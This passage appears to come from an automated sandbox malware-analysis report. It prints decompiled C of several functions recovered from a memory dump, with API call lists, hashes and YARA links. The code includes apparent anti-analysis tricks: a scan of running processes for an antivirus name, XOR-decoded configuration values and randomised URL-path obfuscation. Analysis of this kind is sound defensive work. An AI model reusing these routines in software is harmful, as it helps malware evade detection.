					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x012b7b33
0x012b7b3f
0x012b7b45
0x012b7b4a
0x012b7b4e
0x012b7cc0
0x012b7cc4
0x012b7cc4
0x012b7b54
0x012b7b58
0x012b7b5c
0x012b7b5f
0x012b7b6a
0x012b7b70
0x012b7b75
0x012b7b78
0x012b7b92
0x012b7ba1
0x012b7bad
0x012b7bb7
0x012b7bbc
0x012b7bbe
0x012b7bc1
0x012b7c78
0x012b7c7e
0x012b7c8f
0x012b7ca2
0x012b7cb8
0x00000000
0x012b7cbd
0x012b7bca
0x012b7bd1
0x012b7bd5
0x012b7bdb
0x012b7bdd
0x012b7bdf
0x012b7be1
0x012b7be3
0x012b7bed
0x012b7bf2
0x012b7bf4
0x012b7bf6
0x012b7bf7
0x012b7bf8
0x012b7bf9
0x012b7c00
0x012b7c07
0x012b7c0a
0x012b7c0a
0x012b7bd7
0x012b7bd7
0x012b7bd7
0x012b7c12
0x012b7c1a
0x012b7c26
0x012b7c2b
0x012b7c2b
0x012b7c30
0x00000000
0x00000000
0x012b7c32
0x012b7c35
0x012b7c42
0x00000000
0x00000000
0x012b7c44
0x012b7c44
0x012b7c51
0x012b7c2b
0x012b7c30
0x00000000
0x00000000
0x00000000
0x012b7c30
0x012b7c5b
0x012b7c5e
0x012b7c61
0x012b7c68
0x012b7c68
0x012b7c75
0x00000000
0x012b7c75
0x012b7b61
0x012b7b65
0x012b7b66
0x012b7b68
0x00000000
0x00000000
0x00000000
0x012b7b68
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 012B7BE3
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 012B7BF9
memset.NTDLL ref: 012B7CA2
memset.NTDLL ref: 012B7CB8

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 514388db5ab510da062b032eb59715f0b31ab57c428c4f18784d460ebe5366f3
Instruction ID: 661c4e1cf5a612cc00a75b55ce17adcd806b967ce759d251a5256a790a5d1aa8
Opcode Fuzzy Hash: 514388db5ab510da062b032eb59715f0b31ab57c428c4f18784d460ebe5366f3
Instruction Fuzzy Hash: 1E419331A1021AAFDB11DF68CCC0BEE7775EF95790F104569EA05A7281EB70AE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B7CC7, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E012B7CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x12bd2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x12bd2e0; // 0x3f8a5a8
				_t3 = _t8 + 0x12be876; // 0x61636f4c
				_t25 = 0;
				_t30 = E012B3CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x12bd2e4, 1, 0, _t30);
					E012B4AAB(_t30);
				}
				_t12 =  *0x12bd294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E012B4A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E012B1000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x12bd108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E012B5AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x012b7cc8
0x012b7ccf
0x012b7cd9
0x012b7cdd
0x012b7ce3
0x012b7cf2
0x012b7cf9
0x012b7cfd
0x012b7d0f
0x012b7d11
0x012b7d11
0x012b7d16
0x012b7d1d
0x012b7d74
0x012b7d74
0x012b7d7a
0x012b7d7c
0x012b7d7c
0x012b7d86
0x012b7d8a
0x012b7d9c
0x012b7d9c
0x012b7da0
0x012b7da6
0x012b7da6
0x00000000
0x012b7d36
0x012b7d3b
0x012b7d43
0x012b7d47
0x012b7d4b
0x012b7d4b
0x012b7d58
0x012b7d5c
0x012b7d60
0x012b7db5
0x012b7dbb
0x012b7dbb
0x012b7d6e
0x012b7d72
0x012b7da9
0x012b7dab
0x012b7dae
0x012b7dae
0x00000000
0x012b7dab
0x012b7d72
0x00000000
0x012b7d5c

APIs

Part of subcall function 012B3CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05249B38,00000000,?,?,69B25F44,00000005,012BD00C,?,?,012B539B), ref: 012B3CF8
Part of subcall function 012B3CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 012B3D1C
Part of subcall function 012B3CC2: lstrcat.KERNEL32(00000000,00000000), ref: 012B3D24

CreateEventA.KERNEL32(012BD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,012B21B6,?,00000001,?), ref: 012B7D08

Part of subcall function 012B4AAB: RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

WaitForSingleObject.KERNEL32(00000000,00004E20,012B21B6,00000000,00000000,?,00000000,?,012B21B6,?,00000001,?,?,?,?,012B555B), ref: 012B7D68
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,012B21B6,?,00000001,?), ref: 012B7D96
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,012B21B6,?,00000001,?,?,?,?,012B555B), ref: 012B7DAE

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 7d44a142f0160f6d40277510f67b3dee5c239f6ccec74419776fd6a9988bf68b
Instruction ID: e73ab4113a5165a07807b145befc55216348bac4f185ec695f81dad6b3e987ba
Opcode Fuzzy Hash: 7d44a142f0160f6d40277510f67b3dee5c239f6ccec74419776fd6a9988bf68b
Instruction Fuzzy Hash: 402104336207535BD7326AACACC8AFB76A9EFC87D0B050625FB56E7285DB30C8018354

Uniqueness

Uniqueness Score: -1.00%

Function 6ED002A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 6ED0039A
task.LIBCPMTD ref: 6ED003A6
task.LIBCPMTD ref: 6ED003B2
task.LIBCPMTD ref: 6ED003C1

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 71fa7dbd7019bcad6d924fddb7c4b183ee59baa99b8be540a15be531a8fdba0b
Instruction ID: 41fa1203c62eb918d984024b9f0308571145ad3bf872419a2af43e609b6a6a01
Opcode Fuzzy Hash: 71fa7dbd7019bcad6d924fddb7c4b183ee59baa99b8be540a15be531a8fdba0b
Instruction Fuzzy Hash: 4B4109B1C00248EFDB54CFE4C940BDDBBB4BF48208F1086A9E419AB281EB755A49DF60

Uniqueness

Uniqueness Score: -1.00%

Function 012B2107, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E012B2107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E012B3946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E012B65EA(_t23);
						}
					}
					return _t38;
				}
				if(E012B37AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x12bd2e4, 1, 0,  *0x12bd384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E012B24BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E012B282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E012B51BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E012B7CC7( &_v32, _t39);
					goto L13;
				}
			}

0x012b2107
0x012b2114
0x012b211a
0x012b211b
0x012b211c
0x012b211d
0x012b211e
0x012b2122
0x012b212e
0x012b2132
0x012b21ba
0x012b21ba
0x012b21bd
0x012b21bf
0x012b21c7
0x012b21c7
0x012b21cd
0x012b21d0
0x012b21d0
0x012b21cd
0x012b21db
0x012b21db
0x012b2145
0x012b2147
0x012b2147
0x012b215e
0x012b2162
0x012b2165
0x012b2170
0x012b2177
0x012b2177
0x012b2180
0x012b2184
0x012b2192
0x012b2186
0x012b2186
0x012b2187
0x012b2188
0x012b2189
0x012b218a
0x012b218b
0x012b218b
0x012b2197
0x012b219a
0x012b219e
0x012b21a0
0x012b21a0
0x012b21a7
0x00000000
0x012b21a9
0x012b21a9
0x012b21b6
0x00000000
0x012b21b6

APIs

CreateEventA.KERNEL32(012BD2E4,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,012B555B,?,00000001,?), ref: 012B2158
SetEvent.KERNEL32(00000000,?,?,?,012B555B,?,00000001,?,00000002,?,?,012B53C9,?), ref: 012B2165
Sleep.KERNEL32(00000BB8,?,?,?,012B555B,?,00000001,?,00000002,?,?,012B53C9,?), ref: 012B2170
CloseHandle.KERNEL32(00000000,?,?,?,012B555B,?,00000001,?,00000002,?,?,012B53C9,?), ref: 012B2177

Part of subcall function 012B24BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,012B2197,?,012B2197,?,?,?,?,?,012B2197,?), ref: 012B2598

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 124d1e33be429d75a8d7f082a4b2e3ab820ed4c3bd6a879a74f68240c1ddba0e
Instruction ID: 4c30f31880a24a4db9e229e0fea81294edd4ca14b9143495c69ef6f71a0d5d99
Opcode Fuzzy Hash: 124d1e33be429d75a8d7f082a4b2e3ab820ed4c3bd6a879a74f68240c1ddba0e
Instruction Fuzzy Hash: 4121627693031AEBDB20AFE898C89EE77B9EB483D0B054425EB11A7105D734A9458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED408CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dfcdd151fac80285f6a047480f8bd8ce0852f25e520494b5c555003a68da5d1
Instruction ID: bfeff0c6cef6d18fb16fb33a0d6192d8aad8d9837516f13f1333abf6daeadb84
Opcode Fuzzy Hash: 8dfcdd151fac80285f6a047480f8bd8ce0852f25e520494b5c555003a68da5d1
Instruction Fuzzy Hash: 0621C333A05622EBFF615BA98C44B4A77689B337E0F190510E995AB2C4F630ED0185E2

Uniqueness

Uniqueness Score: -1.00%

Function 012B22D2, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E012B22D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E012B75F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x012b22de
0x012b22e2
0x012b22e3
0x012b22e4
0x012b22e6
0x012b22e8
0x012b22eb
0x012b22f0
0x012b2387
0x012b238e
0x012b238e
0x012b22f9
0x012b2300
0x012b2310
0x012b2310
0x012b2316
0x012b2318
0x012b231d
0x012b2326
0x012b232c
0x012b2331
0x012b233c
0x012b2340
0x012b2342
0x012b2343
0x012b234c
0x012b2350
0x012b2361
0x012b2352
0x012b2357
0x012b235c
0x012b236b
0x012b236b
0x012b2340
0x012b2371
0x012b2377
0x012b2377
0x012b2380
0x012b2385
0x012b2385
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 012B2300
lstrlenW.KERNEL32(?), ref: 012B2336
memcpy.NTDLL(00000000,?,?,?), ref: 012B2357
SysFreeString.OLEAUT32(?), ref: 012B236B

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 29cc75cf91814a78abcca7530ea59b8871691955bf1c34a1cbdda499ddf107e9
Instruction ID: fdbf45418a5f8bf310a97e5ec703009fc35e11c34806b877b5792dd2bdc3ba4c
Opcode Fuzzy Hash: 29cc75cf91814a78abcca7530ea59b8871691955bf1c34a1cbdda499ddf107e9
Instruction Fuzzy Hash: BF21417590120AEFDB11DFA8D9C8DDEBBB9FF49340B104569E941E7210E730EA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
_free.LIBCMT ref: 6ED3F2FB
_free.LIBCMT ref: 6ED3F331
SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4a9f10575ed0ac542a179857621758247acc66a00b7c6cd8973804fc1aad3159
Instruction ID: 6dfd97b266b36cee0032f02ed992d8a43c185b4c3d9ebbeda69f7164534427f6
Opcode Fuzzy Hash: 4a9f10575ed0ac542a179857621758247acc66a00b7c6cd8973804fc1aad3159
Instruction Fuzzy Hash: 6011CA3621591AEEEA9017F48C84DDB315E9BD36B8B340925F138D61D0EF35D80A8131

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6ED28835,6ED3F53A,?,?,6ECF565E,000008BB,6ED8A0D4), ref: 6ED3F3F5
_free.LIBCMT ref: 6ED3F452
_free.LIBCMT ref: 6ED3F488
SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,?,?,6ED28835,6ED3F53A,?,?,6ECF565E,000008BB,6ED8A0D4), ref: 6ED3F493

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b9387bdaceb39c0a6844c145b2cf46bdb18fd8598ed575b0cc49b2b1bae5340b
Instruction ID: dfbbea58bd9eed763562a0f8714abee1b3c104b9045b1f2ae47a8bdfa67582c0
Opcode Fuzzy Hash: b9387bdaceb39c0a6844c145b2cf46bdb18fd8598ed575b0cc49b2b1bae5340b
Instruction Fuzzy Hash: E911E932314919AEEBA027F98C80DDB325DA7E36B9B340A34F528931D0EB34D80A8130

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED0039A
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003A6
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003B2
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003C1

task.LIBCPMTD ref: 6ECFF95F
task.LIBCPMTD ref: 6ECFF96B
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6ECFF980
task.LIBCPMTD ref: 6ECFF998

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 2520070614-0
Opcode ID: ca1eb51249314f664fba9cf191de70394211de8a880f2284b36123bd5c1accc4
Instruction ID: af19d7ac6c9e03897f0df3e43c3461395960fdce211604ffb76cfa7a498dac13
Opcode Fuzzy Hash: ca1eb51249314f664fba9cf191de70394211de8a880f2284b36123bd5c1accc4
Instruction Fuzzy Hash: E321E971D0464CEBCB44DFE4C950BDEBBB9FF48314F148569E429AB294EB346A09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECFF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED0039A
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003A6
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003B2
Part of subcall function 6ED002A0: task.LIBCPMTD ref: 6ED003C1

task.LIBCPMTD ref: 6ECFF87F
task.LIBCPMTD ref: 6ECFF88B
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6ECFF8A0
task.LIBCPMTD ref: 6ECFF8B8

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID:
API String ID: 2520070614-0
Opcode ID: 649f5f77cbceb9bd26ab0f93fb72353e6c0633f6d4f1d178d57088b4c9e34704
Instruction ID: e8a104606749e07bc24164d017b563662b2651fa0ac8770ec86c2eb2ed56edf9
Opcode Fuzzy Hash: 649f5f77cbceb9bd26ab0f93fb72353e6c0633f6d4f1d178d57088b4c9e34704
Instruction Fuzzy Hash: C921FC71D0464CEBCB44DFD4C950BDEBBB9FF48314F148569E425AB294EB346A05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B26DD, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E012B26DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x12bd270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x12bd288; // 0x6163714c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x12bd288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x012b26e5
0x012b26e8
0x012b26ee
0x012b2706
0x012b2708
0x012b270d
0x012b270f
0x012b2712
0x012b2714
0x012b2717
0x012b2719
0x012b2719
0x012b271b
0x012b2726
0x012b272b
0x012b273c
0x012b2744
0x012b2749
0x012b274c
0x012b274f
0x012b2751
0x012b2754
0x012b2757
0x012b2757
0x012b275a
0x012b2765
0x012b276a
0x012b2774

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,012B1A07,00000000,?,?,012B4653,?,052495B0), ref: 012B26E8
RtlAllocateHeap.NTDLL(00000000,?), ref: 012B2700
memcpy.NTDLL(00000000,?,-00000008,?,?,?,012B1A07,00000000,?,?,012B4653,?,052495B0), ref: 012B2744
memcpy.NTDLL(00000001,?,00000001), ref: 012B2765

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4da1d15e4b733698702710139c6be3051670689e0ee24551d594ddaddb7422e4
Instruction ID: 5d92ced2d3fc4fb5d1955144cb430281d0a5e52d08f46fd1fa6779b0012cb767
Opcode Fuzzy Hash: 4da1d15e4b733698702710139c6be3051670689e0ee24551d594ddaddb7422e4
Instruction Fuzzy Hash: D9110672A10219AFC724CAA9ECC8DDABBAEDFD03A0B050276F504D7140E7709E449760

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED01E36
std::_Lockit::_Lockit.LIBCPMT ref: 6ED01E43
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6ED01E80

Part of subcall function 6ED00FAE: _Yarn.LIBCPMT ref: 6ED00FCD
Part of subcall function 6ED00FAE: _Yarn.LIBCPMT ref: 6ED00FF1

std::exception::exception.LIBCMTD ref: 6ED01EA5

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
String ID:
API String ID: 2425033533-0
Opcode ID: 6d6b8abd798ce9efcce46786cafc7d31459dcf5bfcbb8e1f984b0dd85f9294ce
Instruction ID: 3636aa6f343a263dc178cd25cb1dddcfc455d4acd92d5ee64621891c68014ca3
Opcode Fuzzy Hash: 6d6b8abd798ce9efcce46786cafc7d31459dcf5bfcbb8e1f984b0dd85f9294ce
Instruction Fuzzy Hash: E30180B1405784AECB308FAA948058BFEE4BF28254B548D6FE58D87B00D770D504CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 012B4A03, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E012B4A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x12bd2e0; // 0x3f8a5a8
						_t2 = _t9 + 0x12bee3c; // 0x73617661
						_push( &_v264);
						if( *0x12bd110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x012b4a0e
0x012b4a18
0x012b4a1c
0x012b4a26
0x012b4a57
0x012b4a2d
0x012b4a32
0x012b4a3f
0x012b4a48
0x012b4a5f
0x012b4a4a
0x012b4a52
0x00000000
0x012b4a52
0x012b4a60
0x012b4a61
0x00000000
0x012b4a61
0x00000000
0x012b4a5b
0x012b4a67
0x012b4a6c

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 012B4A13
Process32First.KERNEL32(00000000,?), ref: 012B4A26
Process32Next.KERNEL32(00000000,?), ref: 012B4A52
CloseHandle.KERNEL32(00000000), ref: 012B4A61

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d90ca381d229e096ae2ccb84ca033c96ed1caf9c09b38e9ad1e60c433f029db3
Instruction ID: f3f1d83b719c33d2a5bf5ce5e991911a9bfdacdee8554e83a0c16f6c8daf3942
Opcode Fuzzy Hash: d90ca381d229e096ae2ccb84ca033c96ed1caf9c09b38e9ad1e60c433f029db3
Instruction Fuzzy Hash: FCF02B3112016967D721B666ACDDDEB36ACDBC5394F000062EA57D3002EA20DA4587B5

Uniqueness

Uniqueness Score: -1.00%

Function 012B4450, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B4450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x12bd2a4; // 0x2ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x12bd2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x12bd2a4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x12bd270; // 0x4e50000
				if(_t7 != 0) {
